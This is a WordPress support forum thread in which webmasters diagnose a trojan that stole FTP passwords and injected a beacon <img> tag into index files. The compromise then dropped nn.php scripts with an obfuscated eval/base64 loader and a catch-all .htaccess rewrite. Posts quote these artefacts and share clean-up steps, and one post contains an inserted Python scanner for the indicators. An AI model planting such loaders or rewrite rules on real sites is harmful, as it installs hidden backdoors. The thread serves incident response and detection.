WordPress.org

Forums

[resolved] XML parsing error (42 posts)

  1. iciman
    Member
    Posted 4 years ago #

    I have started to get an "XML parsing error" from my website http://www.glamourgrannytravels.com

    W3C Validator says that it is coming from line 195:
    <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">

    This is directly after the </rss> line.

    I have no idea how to clear the problem!! Could somebody please explain the problem, how this line got there after the site is over 4 months old and most importantly how to solve it.

    Thank you in advance.

  2. esmi
    Forum Moderator
    Posted 4 years ago #

    Have you tried:

    - checking through Troubleshooting WordPress 3.1 - Master List

    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Ten theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  3. iciman
    Member
    Posted 4 years ago #

    Thank you for your response. I have tried all of these suggestions but none of them worked.

    Please suggest another way of solving this problem.

  4. esmi
    Forum Moderator
    Posted 4 years ago #

    Try looking in your theme's footer.php template file. You've got a whole load of code outside of the </body></html> tags.

  5. jbekker
    Member
    Posted 4 years ago #

    You or someone who also uses your FTP data has got a trojan --> win32/kryptik

    This trojan sends all your FTP data and passwords to someone who then uses it to change all index.html and index.php files on your server and adds to the end a string like <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">
    The number at the end changes on every file...

    I had it today for a few customers on Joomla sites

    John Bekker
    SJL Creations

  6. domasgel
    Member
    Posted 4 years ago #

    Anyone know how to fully remove this trojan? In my website hosting I saw this line at the end of the file: <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">. Also in my hosting there was the IP 46.252.134.6. Help.

  7. esmi
    Forum Moderator
    Posted 4 years ago #

  8. domasgel
    Member
    Posted 4 years ago #

    Sorry, 'esmi', I'm not a newbie and this doesn't help; I'm not using WordPress. It was on a website with no CMS.

  9. esmi
    Forum Moderator
    Posted 4 years ago #

    Then why are you posting on a WordPress support forum?

  10. iciman
    Member
    Posted 4 years ago #

    Thank you John. You were right. I removed the code from the index.php and it sorted it out. Unfortunately I have now found it on some of my other sites I look after :-(

    So it looks like virus scans all night and then checking the other sites.

    Thanks again John.

  11. esmi
    Forum Moderator
    Posted 4 years ago #

  12. jbekker
    Member
    Posted 4 years ago #

    "So it looks like virus scans all night and then checking the other sites."
    REMEMBER: it's NOT WordPress that got hacked but YOUR PC

    Make sure:

    1. that the virus is removed from your PC
    2. you change ALL FTP passwords on the sites you used
    3. just overwrite all files with the latest WordPress
    4. check if there are more lines on your server
    5. # find all files containing the string imgaaa.net in all subdirs
       grep -lr imgaaa.net . > bad.txt

  13. Sventy
    Member
    Posted 4 years ago #

    @esmi - it makes sense to post here. Be it only to make clear it is not a WP exploit (what one might think at first) - we also have Joomla and custom-coded websites affected by this.

    Important Note: the attack comes in two stages. In stage one you see the HTML code injected as above.
    About a day later I see uploads of files that have names like "23.php" or "56.php" - always a two-digit number.

    Those files start with something like:

    <? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ...UQ=='))); ?>

    I haven't yet decoded the binary to see what it does.

    You also see an upload of a .htaccess file with this content:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
    </IfModule>

    Where the binary code is being uncompressed and executed.

    From what I can see on my behalf I suspect the involvement of the TR/Crypt.XPACK.Gen Trojan - but I can not yet 100% confirm it.

    Sven

  14. jbekker
    Member
    Posted 4 years ago #

    Sven, you're right it's not a WP bug or hole but the initial attack comes from a Trojan on your PC...

    After getting your FTP data it changes the index.php and index.html files on the FTP servers...

    Did not know about the second step. Fortunately I changed all FTP passwords..

  15. Sventy
    Member
    Posted 4 years ago #

    Yes it starts with a Trojan - what bothers me is the 2 step approach. I don't quite understand what the motivation is. If the Trojan sends out the passwords - why do they need the HTML injection to report the URL back? The Trojan could tell them...

  16. jbekker
    Member
    Posted 4 years ago #

    Maybe they use the injection to check if the site is monitored and only infect sites that call back for a while...

  17. Sventy
    Member
    Posted 4 years ago #

    @jbekker - yes I thought about this. Or maybe to clean the incoming passwords of outdated login data that doesn't work anymore, and keep only passwords that still work.

    But the "price" for this would be an extremely high detection rate. If you look around the internet - almost all discussions start because a website didn't work anymore. Just appending HTML code will break many scripts, even ones as popular as WP and Joomla.

    So why provoke such a high attention/detection rate?

    What comes to my mind is: to divert our attention from what they are really doing. I have seen this once before: A very obvious attack, easy to detect and easy to clean up. At the same time a very smart hidden backdoor was installed, which you might not notice because you clean up the easy, obvious stuff.

    Sven

  18. Sventy
    Member
    Posted 4 years ago #

    Interesting discussion and some clean-up stuff in this thread here:

  19. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    So far there are another two topics dealing with the same issue:
    malicious 96.php in wordpress
    RSS feed won't validate, junk after document element

    The big question is: how did this trojan get our "secured" FTP passwords? I'm using FileZilla as a client, what about you?

  20. UseShots
    Member
    Posted 4 years ago #

    Hi,

    Can anyone send me this 96.php (or whatever it is called on your server) file? I believe there may be some more files involved. You can contact me here:
    http://www.UnmaskParasites.com/contact/

    @jbekker: How do you know about the "win32/kryptik"? (I agree that password-stealing malware may be involved. I just want to know how you figured out it was "win32/kryptik". Did you find it on the computers of webmasters?)

  21. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    Here's the content of this nasty thing:
    [Code moderated as per the Forum Rules. Please use the pastebin]

    It also writes to index.php and .htaccess and leaves some HTML pages in the logs folder of the website.

  22. jbekker
    Member
    Posted 4 years ago #

    @UseShots I blamed the Kryptik because the outbreak occurred after the virus warning popped up on the laptop.

  23. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    Sorry moderator for posting the file directly on the thread, I have now put it on http://pastebin.com/0JRY8GcX

  24. UseShots
    Member
    Posted 4 years ago #

    Thanks @jbekker and @Abdessamad Idrissi.

    Did you notice the .log/ directory or some other directory whose name begins with the "."?

  25. jbekker
    Member
    Posted 4 years ago #

    @UseShots I looked for .(dot) directories but did not find any.

    I changed all FTP passwords right after discovery of the breach...
    So this might have helped prevent the next step in the attack.

    I checked the FTP logs and all index.php and index.html files were uploaded using FTP from IP 46.252.130.109

  26. UseShots
    Member
    Posted 4 years ago #

    Hi,

    I checked hundreds of infected sites (with nn.php scripts) and almost every one of them contained the ".log/<domain_name>" directory next to that script. The directory contains cached spammy pages and attack maintenance files (e.g. malicious scripts).

    Can anyone who found such nn.php files on their site please contact me?
    http://www.UnmaskParasites.com/contact/ (even if you've already removed them). I need some additional information.

    Thanks for your help!
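
    As an added example (not code from this thread, from WordPress or from UnmaskParasites), here is a small Python scanner that looks for the artefacts the posts above describe: the imgaaa.net beacon <img> appended to index files (post 12's grep), the dropped two-digit nn.php scripts that start with eval(gzuncompress(base64_decode(...))) and the catch-all .htaccess rewrite into one of them (post 13), and hidden .log/ directories beside the script (post 26). The sample site tree it builds is constructed for the demonstration with inert placeholder contents, and the indicator list is only what this thread reports, not a complete signature set.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators quoted in this thread; not a complete signature set for the campaign.
INJECTED_MARKER = "imgaaa.net"                      # beacon <img> appended to index.php/index.html
STAGE2_NAME = re.compile(r"^\d{2}\.php$")           # dropped two-digit scripts such as 26.php or 96.php
STAGE2_PREFIX = re.compile(r"<\?\s*eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(")
HTACCESS_REWRITE = re.compile(r"RewriteRule\s+\S+\s+\S*/\d{2}\.php")  # catch-all rewrite into nn.php

def scan_site(root):
    """Walk `root` and return a sorted list of (reason, relative_path) findings."""
    root, findings = Path(root), []
    for dirpath, dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        for name in dirnames:                       # hidden dirs like ".log/<domain>" beside the script
            if name.startswith("."):
                findings.append(("hidden-dir", (d / name).relative_to(root).as_posix()))
        for name in filenames:
            p = d / name
            rel = p.relative_to(root).as_posix()
            head = p.read_bytes()[:65536].decode("latin-1")   # only the first 64 KiB is inspected
            if STAGE2_NAME.match(name):
                findings.append(("two-digit-php", rel))
            if STAGE2_PREFIX.search(head[:512]):    # the eval chain sits at the very top of the file
                findings.append(("eval-gzuncompress", rel))
            if INJECTED_MARKER in head:
                findings.append(("injected-img", rel))
            if name == ".htaccess" and HTACCESS_REWRITE.search(head):
                findings.append(("htaccess-rewrite", rel))
    return sorted(findings)

def build_demo_site(base):
    """Constructed sample tree reproducing the artefacts described in the thread (inert placeholders)."""
    base = Path(base)
    (base / "wp-admin" / ".log" / "example.test").mkdir(parents=True)
    (base / "index.php").write_text('<?php echo "site"; ?>\n'
        '<img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=0">\n')
    (base / "wp-admin" / "26.php").write_text("<? eval(gzuncompress(base64_decode('AAAA'))); ?>")
    (base / ".htaccess").write_text("<IfModule mod_rewrite.c>\nRewriteEngine On\n"
        "RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]\n</IfModule>\n")
    (base / "clean.php").write_text("<?php echo 'unrelated'; ?>")  # control file: must not be flagged
    return base

def demo():
    """Build the constructed tree in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_site(build_demo_site(tmp))
```

    Run scan_site() against the document root of a suspect site; every hit is a file or directory to inspect by hand, and an empty list only means none of these particular indicators were found.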

  27. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    I checked my FTP logs and found the bad guys who put these files come from this IP 91.200.240.10, which leads to Ukraine

    Another bad thing is the fact that Google says in its search results that my website is pirated! Just next to the result title!

    Fortunately I used Google Webmaster Tools to report this and it was corrected the next day.

    Again, change all your FTP passwords; I forgot one password and the virus hit me again. It planted a file in the wordpress/wp-admin/41.php

  28. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    Please everybody, tell us what FTP client you use?
    I would like to know how this a** h**** (sorry for my bad language!) got my passwords.

    I use the latest version of the FileZilla FTP client for Windows.
    (and a big security hole: I saved all my passwords in a Word document with a strong password)

    what about you?

  29. jbekker
    Member
    Posted 4 years ago #

    I was also using FileZilla. And FileZilla saves your passwords in clear text.

    So after changing all passwords I did not save them anymore in FileZilla

  30. iciman
    Member
    Posted 4 years ago #

    Hello everybody and thanks for all the comments and questions.

    I started this thread about a month ago because I had the problem on one of my websites. After reading the replies I soon discovered that I had the same problem on all of the websites I look after (around 20 of them!!). What a weekend I had deleting and changing passwords. It also created problems with the feeds on the WordPress sites, with one site being banned because of this problem.

    I have noticed that there is a little bit of a recurring theme in a lot of the replies, that is - that FileZilla is used by people with the problem. I too use the program for file transfers and have done for a number of years. I am going to post on the FileZilla forum today to see what response I get from them.

    Anyway, after a month I have just discovered that it is back on one of my sites (and I haven't checked the others yet due to having to delete over 15,000 files added to the site!!!). My question is this - has anybody got a definitive answer on how to remove this problem for good? And how did it start? I have AVG antivirus and Ad-Aware with automatic virus checks set up for 4 times a week. Yes, I have had viruses on my computer but I have not worked on some of the sites that got infected for months but they still got infected - how?

    This is the most frustrating time for me because I have people relying on me to look after their sites.

Topic Closed

This topic has been closed to new replies.
